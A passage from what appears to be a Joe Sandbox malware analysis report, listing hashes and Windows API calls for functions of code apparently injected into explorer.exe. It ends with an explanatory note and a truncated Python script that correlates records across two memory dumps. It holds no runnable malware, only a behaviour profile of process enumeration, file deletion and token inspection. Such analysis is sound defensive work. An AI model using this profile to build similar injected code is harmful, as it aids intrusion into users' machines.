      • Opcode Fuzzy Hash: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
      • Instruction Fuzzy Hash: 82C08C72D960008AE65BC6908A87644BB33F003830B341F2DC5018F126D272C2178220
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
      • Instruction ID: b8708e0fd601c17419c4bee628408aeaf70cc106fe2e9d70b960fe5b7e9fb35e
      • Opcode Fuzzy Hash: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
      • Instruction Fuzzy Hash: 0DC02B7308020940C754CE701A0010CF2D09555208F31FD234005FF182D260F1C755C2

      Execution Graph

      Execution Coverage:42.2%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:8%
      Total number of Nodes:200
      Total number of Limit Nodes:18
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: NameUser
      • String ID:
      • API String ID: 2645101109-0
      • Opcode ID: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
      • Instruction ID: ece3728c4093050e5d571a6c77323dfe9c6eaa60557db6bd54d602e0a60d787c
      • Opcode Fuzzy Hash: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
      • Instruction Fuzzy Hash: 2E114C34718B4C4FCB90EF6C901836EB6D2FBDC306F400A6E984EC3358DAB889458781

      Control-flow Graph (graph rendering omitted)
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: DeleteFile$ExitSleepThreadUser
      • String ID: |:|
      • API String ID: 2796381497-3736120136
      • Opcode ID: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
      • Instruction ID: a4d6641c5a0770538b28230b55e5ab02bace721750c55dfafe486b85c1773c0d
      • Opcode Fuzzy Hash: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
      • Instruction Fuzzy Hash: 23E1B730728F488BDB59AB28C4583AA76D1FB98312F14062ED89FD3395DF74E9028795

      Control-flow Graph

      • Function start: 02F22434 (graph not rendered)
      • API calls on graph: DeleteFileW (x2), SleepEx, RtlExitUserThread
      • Internal subroutines called: 02F22968, 02F2356C, 02F23F08, 02F247C8, 02F24A48, 02F25044, 02F250F0, 02F25204, 02F253F4, 02F25470, 02F25490
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: DeleteFile$ExitSleepThreadUser
      • String ID: |:|
      • API String ID: 2796381497-3736120136
      • Opcode ID: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
      • Instruction ID: b61b1a19a0d1122c38a0cb15e3304c09cdeb41e5acb571377820d73b109d2262
      • Opcode Fuzzy Hash: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
      • Instruction Fuzzy Hash: B4E1C830718F588FD719EB2888687BA76D1FB99351F50062ED99FD3280DF34E9058B86

      Control-flow Graph

      • Function start: 08751AF8 (graph not rendered)
      • API calls on graph: RtlCreateHeap, CreateThread (x2), FindCloseChangeNotification
      • Internal subroutines called: 08751E30, 08754C44 (x3), 08755044, 087553F4
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: Create$Thread$ChangeCloseFindHeapNotification
      • String ID: iP+
      • API String ID: 1654390035-51890417
      • Opcode ID: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
      • Instruction ID: b654dd93c1979b6b15e79898f85312fa323dae96465564b0a465d7091f29bc5e
      • Opcode Fuzzy Hash: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
      • Instruction Fuzzy Hash: 4291B330618A088FCF58EF18D8957A573D6FB94303B98017EDC4ECB25AEA70D541CBA6

      APIs
      • DeleteFileW.KERNEL32 ref: 087520B6
      • CopyFileW.KERNEL32 ref: 087520C5
      • DeleteFileW.KERNEL32 ref: 087520D6
      • DeleteFileW.KERNEL32 ref: 08752121
        • Part of subcall function 08754A48: SetFileAttributesW.KERNEL32 ref: 08754A97
        • Part of subcall function 08754A48: CreateFileW.KERNEL32 ref: 08754AC1
        • Part of subcall function 08754A48: SetFileTime.KERNEL32 ref: 08754AEC
      • CreateFileW.KERNEL32 ref: 087521AD
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: File$Delete$Create$AttributesCopyTime
      • String ID:
      • API String ID: 642576546-0
      • Opcode ID: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
      • Instruction ID: 26f786566129bb6357fc72cdf92b551c5fd19da4489c06f55c9e422d06f12361
      • Opcode Fuzzy Hash: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
      • Instruction Fuzzy Hash: 04414C20718A4C4FDFA8EF6C945836E35D2EBCC212F50053EA90EC7389DEB89D068795

      Control-flow Graph

      • Function start: 08753D1C (graph not rendered; SleepEx branches back to CreateToolhelp32Snapshot, so the process list is re-enumerated in a loop)
      • Internal subroutines called: 087551D8, 0875483C
      APIs
      • CreateToolhelp32Snapshot.KERNEL32 ref: 08753D3E
      • Process32First.KERNEL32 ref: 08753D5D
      • Process32Next.KERNEL32 ref: 08753DA8
      • FindCloseChangeNotification.KERNEL32 ref: 08753DB5
      • SleepEx.KERNEL32 ref: 08753DC0
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSleepSnapshotToolhelp32
      • String ID:
      • API String ID: 14014868-0
      • Opcode ID: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
      • Instruction ID: ffb036a2c8ac557ee8da5ac5e6d5c249f66934cc7ad775dd5f7e0c4d2a4111e1
      • Opcode Fuzzy Hash: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
      • Instruction Fuzzy Hash: 8E21D230218A088FDB58AF24C0887AA72A2FB88356F140A3ED80FDA29DDB7494458761

      Control-flow Graph

      • Function start: 02F21AF8 (graph not rendered)
      • API calls on graph: RtlCreateHeap, CreateThread (x2)
      • Internal subroutines called: 02F21E30, 02F24C44 (x3), 02F25044, 02F253F4
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: Create$Thread$Heap
      • String ID: iP+
      • API String ID: 1054751041-51890417
      • Opcode ID: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
      • Instruction ID: bfd0de9bac1a75ec152ba0b9c21e269c2be86b86fec9a94ac7903e6eae8f1316
      • Opcode Fuzzy Hash: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
      • Instruction Fuzzy Hash: 4891B230A18E088FCF58EF18DC826A673E6FB95340B480179DD4ECB156DA74E545CB9A

      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: File$AttributesCreateTime
      • String ID:
      • API String ID: 1986686026-0
      • Opcode ID: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
      • Instruction ID: b9a1d271c2cb268d84f72bf521c1f1ff73b2f2a2d3b41d15412c41ebaa5bfea9
      • Opcode Fuzzy Hash: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
      • Instruction Fuzzy Hash: 2F21303070CA488FDF64EF68988879EB6E2FBDC705F10456EA84EC7245DA34DA058782

      Control-flow Graph

      • Function start: 087540A4 (graph not rendered)
      • API calls on graph: RtlAllocateHeap, RtlReAllocateHeap
      • Internal subroutines called: 087544E8, 0875455C, 08755044, 087550F0, 0875539C, 087553F4, 08755450, 087554AC, 08755490
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
      • Instruction ID: 7b06944b59648bff5f3f61beae3674d26a678bddebaa1dfacd68b8fd194eb120
      • Opcode Fuzzy Hash: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
      • Instruction Fuzzy Hash: 9CD19330718B098FDB64EF68D4496AEB7E2FF98701F10452DE84AD3245DE74E8428B96

      Control-flow Graph

      • Function start: 08754F28 (graph not rendered)
      • Internal subroutines called: 08755044, 08755204, 087553F4
      APIs
      • RegQueryValueExA.KERNEL32 ref: 08754FAD
      • ObtainUserAgentString.URLMON ref: 08755016
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: AgentObtainQueryStringUserValue
      • String ID:
      • API String ID: 4107646653-0
      • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
      • Instruction ID: fac86ed4e8bd2bb91b74a659a80d557605e32a2cb803d6aeeb6759a864c4a307
      • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
      • Instruction Fuzzy Hash: FE31B631608A488FDF18EF6CD8895E977D1FB88315B00027EEC5EC7645EEB4980687E1

      APIs
        • Part of subcall function 08754DB8: GetVolumeInformationA.KERNEL32 ref: 08754E25
      • CreateMutexExA.KERNEL32 ref: 08751F27
      • CreateFileMappingA.KERNEL32 ref: 08751FD9
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: Create$FileInformationMappingMutexVolume
      • String ID:
      • API String ID: 3260430491-0
      • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
      • Instruction ID: c547a6a2eb8c0173e19000af88f6da15901c60320813a12413d2ff8ef945013d
      • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
      • Instruction Fuzzy Hash: BD415F30718F088FEB64EB38801C7AA76D1EB98717F504A2E885ED6289CFB49602D755

      APIs
        • Part of subcall function 02F24DB8: GetVolumeInformationA.KERNEL32 ref: 02F24E25
      • CreateMutexExA.KERNEL32 ref: 02F21F27
      • CreateFileMappingA.KERNEL32 ref: 02F21FD9
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: Create$FileInformationMappingMutexVolume
      • String ID:
      • API String ID: 3260430491-0
      • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
      • Instruction ID: 5c4f15f445effe8abc1aa45ae53e830f6fc9cf25730eedf10259f930b8ce1d3e
      • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
      • Instruction Fuzzy Hash: 4741D530B08F188FEB64EB3484187AF72D2EF99756F40492E855FD6244CF74960A8B81

      APIs
      • GetTokenInformation.KERNELBASE ref: 08754BBC
      • GetTokenInformation.KERNELBASE ref: 08754BF3
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: InformationToken
      • String ID:
      • API String ID: 4114910276-0
      • Opcode ID: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
      • Instruction ID: 9f13ded76f057174db582e201064a52d504701bf12812d23cd325431a5f62245
      • Opcode Fuzzy Hash: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
      • Instruction Fuzzy Hash: 9E213334608A088FC754EF28C45856AB7E2FFD9311B004A6EE49AC7364DA70E845DB41

      APIs
      • GetTokenInformation.KERNELBASE ref: 02F24BBC
      • GetTokenInformation.KERNELBASE ref: 02F24BF3
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: InformationToken
      • String ID:
      • API String ID: 4114910276-0
      • Opcode ID: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
      • Instruction ID: dbde98923ac5bb36f4682043a0e1f6a653f9574b0e1d10cd134064c7cda8b4e3
      • Opcode Fuzzy Hash: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
      • Instruction Fuzzy Hash: 0A210134608A188FC754EF28D49866AB7E2FFD9311B004A6EE59AC7264DB70EC459B81

      Control-flow Graph

      • Function start: 02F23D1C (graph not rendered)
      • API calls on graph: CreateToolhelp32Snapshot, SleepEx
      • Internal subroutines called: 02F251D8, 02F2483C
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: CreateSleepSnapshotToolhelp32
      • String ID:
      • API String ID: 684154974-0
      • Opcode ID: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
      • Instruction ID: 62e0a7a736a0b92164ef79647558614512471a9c47f75cbaa36e6e08760b15aa
      • Opcode Fuzzy Hash: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
      • Instruction Fuzzy Hash: 25210A30214A1C8FDB18EF64C4887AA72E2FB89355F540B7EE54FDE145DB389449C751
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: EnumSleepWindows
      • String ID:
      • API String ID: 498413330-0
      • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
      • Instruction ID: 27e2186cf2a812d0e5c85e72314b0ebbc849e80339b4b67ddea2b25a28c96213
      • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
      • Instruction Fuzzy Hash: D3E04F30505609CFEB68AFA5C0DCBB036A1EB18206F14017EDC0EDD2A9CB764945C730

      Control-flow Graph

      • Function start: 02F23DF8 (graph not rendered)
      • API calls on graph: EnumWindows, SleepEx (called in a loop)
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: EnumSleepWindows
      • String ID:
      • API String ID: 498413330-0
      • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
      • Instruction ID: 2f7156017839cf04e335c01c475b469fc0d937283fe688c48a794a63c5e139b0
      • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
      • Instruction Fuzzy Hash: 7AE04F30904A098FEB68AFA5C0DCBB036A1EB18206F1401BADD0EDD285CB7A494DC720

      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
      • Instruction ID: 7d76533d4c43a26cc1947cd5d4f55a4922499da17e2abfdd2b2d4ed5b07d8e8b
      • Opcode Fuzzy Hash: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
      • Instruction Fuzzy Hash: A2D1B230B18B198FDB58EF68D84576EB7E2FB99740F50452EE54AC3241DF74E8068B82
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: CreateFile
      • String ID:
      • API String ID: 823142352-0
      • Opcode ID: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
      • Instruction ID: 9fe8805dc2754fcf2aa3118cc879f0f3aae556c263f6b404a63950e226ae4d6a
      • Opcode Fuzzy Hash: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
      • Instruction Fuzzy Hash: 6D414020718A6C4FDB98AF6C585836D71D3EBD9751F50013D990EC7385CE789D0A8781
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: CreateFile
      • String ID:
      • API String ID: 823142352-0
      • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
      • Instruction ID: 5d19aa62fba4f8e6259abad89df4d27d948eb50135fc4758212d52b751e5fb8c
      • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
      • Instruction Fuzzy Hash: 8441A330718A0D4FD79CEA7C945937AB6C2FB89612F10062EA89FC3355DE74981347D2
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: CreateFile
      • String ID:
      • API String ID: 823142352-0
      • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
      • Instruction ID: 80255f198ec68189e2e62dd41f7705da192ddb1f62aab0ec8329b65b13dbb17a
      • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
      • Instruction Fuzzy Hash: 9741C23071CE1E4FD75CEA6C985937AB6C2FB89761F50026EA69FC3241DE289C1647C2
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: QueryValue
      • String ID:
      • API String ID: 3660427363-0
      • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
      • Instruction ID: 5acbcaf16425667662353739b59b26e728ec31631883a1d100bbb856585dcdbd
      • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
      • Instruction Fuzzy Hash: 0031C631608A598FDB18EF68DC896E977D2FB99350B00027AE94AC7145EF74DC0A47D1

      APIs
      • GetVolumeInformationA.KERNEL32 ref: 08754E25
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
      • Instruction ID: c7725b4c8d14fd951d800ceb8dde2b8ed48763b0edda92704f9c3c55d3c8d49b
      • Opcode Fuzzy Hash: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
      • Instruction Fuzzy Hash: 4A316730618A4C8FDB64EF28C448AAA77E1FBD8311F10466E984EC7264DE74D945CB91

      APIs
      • GetVolumeInformationA.KERNEL32 ref: 02F24E25
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
      • Instruction ID: 2e1b7213347e248d3a5f27be914c82e2705b4939bdab9a050a4ef24e92055234
      • Opcode Fuzzy Hash: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
      • Instruction Fuzzy Hash: 19318B30618A4C8FDB64FF28C858BAA77E2FBD8311F10466E994EC7264DE30D945CB81

      APIs
        • Part of subcall function 08751AF8: RtlCreateHeap.NTDLL ref: 08751C0F
      • SleepEx.KERNEL32(?,?,?,?,?,?,?,08751A9B), ref: 08751AC8
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID: CreateHeapSleep
      • String ID:
      • API String ID: 221814145-0
      • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
      • Instruction ID: 632676b1599dcb8c70b530a48241a5b9715405a3cf2d6af2de784e972a80112e
      • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
      • Instruction Fuzzy Hash: 3EE04F14714F084BDB95BBB8D4D872D7191EB88253F94467EAD1EC638DD9B4CC815331

      APIs
        • Part of subcall function 02F21AF8: RtlCreateHeap.NTDLL ref: 02F21C0F
      • SleepEx.KERNEL32(?,?,?,?,?,?,?,02F21A9B), ref: 02F21AC8
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID: CreateHeapSleep
      • String ID:
      • API String ID: 221814145-0
      • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
      • Instruction ID: c53844c2e1407def2fb34f59902f876b661472c6afaee09f05cc4081158fdb10
      • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
      • Instruction Fuzzy Hash: 15E04810714F1C0BDB94BBB8D8D472F7191EB8A2D0F54157D9A1EC6186D925C8494B25

      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
      • Instruction ID: 3fb6c69d212b9d07243242311dfc4e17a6db13c39d2757e782f8b817db99b2b0
      • Opcode Fuzzy Hash: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
      • Instruction Fuzzy Hash: 6DD18830718F088FDB68EF6C849826E72D2FB98306F50456ED84EC3259DFB4E9468795

      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
      • Instruction ID: bd81ef8100e8e552e60756cc436841ba97821fb015e0e68f7417ebebbba2baa8
      • Opcode Fuzzy Hash: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
      • Instruction Fuzzy Hash: 57D1B630718F188FDB68EF68849826EB2D2FB99351F50052ED94FC3255DF74E90A8B85
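
      Most functions above appear twice, once per memory dump of explorer.exe (Offset 02F21000 and Offset 08751000). In every pair the Opcode ID is identical while the Instruction ID differs, and the API ID can differ as well: the function at offset 0AF8 is listed as Create$Thread$ChangeCloseFindHeapNotification in one dump and Create$Thread$Heap in the other, and the process-enumeration loop at offset 2D1C shows Process32First/Process32Next in one dump only. The opcode-only hash ignores relocated operands, so it is the right key for "same function, different base"; the API list depends on which call targets the IDA plugin could symbolize in that particular snapshot, so it should be merged across copies rather than compared. One more caveat when reading these lists: kernel32 exports FindCloseChangeNotification at the same address as CloseHandle, so that name almost always marks a plain CloseHandle call. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It takes six records copied from above (dump base, graph start address, Opcode ID, Instruction ID, API names as printed) in a constructed in-memory form, groups them by Opcode ID, checks that each copy sits at the same offset from its dump base, and merges the API names with the alias folded. The record layout and the function names are this example's own.

```python
"""Correlate per-function records across two memory dumps of one injected image.

Constructed input: function records copied from the report above (dump base,
graph start address, Opcode ID, Instruction ID, API names as printed). The
record layout and all function names here are the example's own, not Joe
Sandbox output.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple

# kernel32 exports FindCloseChangeNotification and CloseHandle at the same
# address, so address-based symbolization can print either name for a
# CloseHandle call. Fold the alias before comparing API sets.
API_ALIASES = {"FindCloseChangeNotification": "CloseHandle"}


@dataclass(frozen=True)
class FunctionRecord:
    dump_base: int          # "Offset:" of the .sdmp the function was lifted from
    start: int              # first address of its control-flow graph
    opcode_id: str          # hash over opcodes only: unchanged by relocation
    instruction_id: str     # hash over whole instructions: changes with the base
    apis: Tuple[str, ...]   # API names symbolized at call sites in that dump


RECORDS: List[FunctionRecord] = [
    # Heap setup followed by two worker threads
    FunctionRecord(0x08751000, 0x08751AF8,
                   "cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65",
                   "b654dd93c1979b6b15e79898f85312fa323dae96465564b0a465d7091f29bc5e",
                   ("RtlCreateHeap", "CreateThread", "FindCloseChangeNotification", "CreateThread")),
    FunctionRecord(0x02F21000, 0x02F21AF8,
                   "cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65",
                   "bfd0de9bac1a75ec152ba0b9c21e269c2be86b86fec9a94ac7903e6eae8f1316",
                   ("RtlCreateHeap", "CreateThread", "CreateThread")),
    # Delete two files, sleep, exit the thread
    FunctionRecord(0x08751000, 0x08752434,
                   "af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d",
                   "a4d6641c5a0770538b28230b55e5ab02bace721750c55dfafe486b85c1773c0d",
                   ("DeleteFileW", "DeleteFileW", "SleepEx", "RtlExitUserThread")),
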